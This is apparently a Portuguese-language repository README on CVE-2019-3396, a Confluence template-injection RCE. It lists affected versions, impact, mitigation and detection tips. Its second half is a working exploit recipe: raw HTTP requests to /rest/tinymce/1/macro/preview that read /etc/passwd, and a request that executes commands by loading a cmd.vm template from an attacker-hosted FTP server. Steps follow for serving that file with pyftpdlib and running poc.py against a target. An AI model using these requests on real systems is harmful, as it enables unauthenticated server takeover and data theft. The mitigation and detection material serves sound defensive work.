CVE-2019-3396
CVE-2019-3396 confluence SSTI RCE
🔎 O que é o CVE-2019-3396?
- Um bug crítico do Confluence (Atlassian).
- Tipo: Injeção de Template + Path Traversal.
- Risco: Execução Remota de Código (RCE) sem login.
- Status: Explorado ativamente na natureza.
🛑 Versões Afetadas
- 6.6.0 → 6.6.11 ❌ vulnerável
- 6.6.12 ✅ corrigida
- 6.12.0 → 6.12.2 ❌ vulnerável
- 6.12.3 ✅ corrigida
- 6.13.0 → 6.13.2 ❌ vulnerável
- 6.13.3 ✅ corrigida
- 6.14.0 → 6.14.1 ❌ vulnerável
- 6.14.2 ✅ corrigida
👉 Sempre consulte o advisory oficial da Atlassian para obter todos os detalhes.
💥 Impacto
- Comprometimento total do servidor
- Roubo de dados, ransomware, criptomineradores
- Atacantes podem executar qualquer código que quiserem
🔐 Mitigação
- ✅ Atualize para a versão corrigida do Confluence (melhor solução)
- 🚫 Desative a macro Widget Connector se não puder aplicar a correção imediatamente
- 🔒 Restrinja o acesso (somente interno até a correção)
👀 Detecção (dicas seguras)
- Monitore os logs em busca de requisições estranhas atingindo os endpoints de macro/preview
- Procure por processos estranhos ou tráfego de saída
- Use scanners de vulnerabilidades para confirmar a versão
📂 Ler Arquivo
POST /rest/tinymce/1/macro/preview HTTP/2
Host: {***}
{"macro":{"params":{"_template":"file:///etc/passwd"}}}
Executar Comando
POST /rest/tinymce/1/macro/preview HTTP/2
Host: ***
{"contentId":"1","macro":{"name":"widget","params":{"_template":"ftp://***:8888/cmd.vm","command":"id"},"body":""}}
Automação
- faça upload do cmd.vm no seu VPS
- use ftp ou https para criar um link para este arquivo cmd.vm via
pip install pyftpdlib
python -m pyftpdlib -p 8888
- atualize o arquivo poc.py com o novo valor para pyftp = "ftp://10.100.10.100:8888/cmd.vm"
python poc.py <url> <cmd>
python poc.py https://ip:port "id"
⚠️ DICA — este repositório é apenas para educação, defesa e conscientização.
🔗 Referências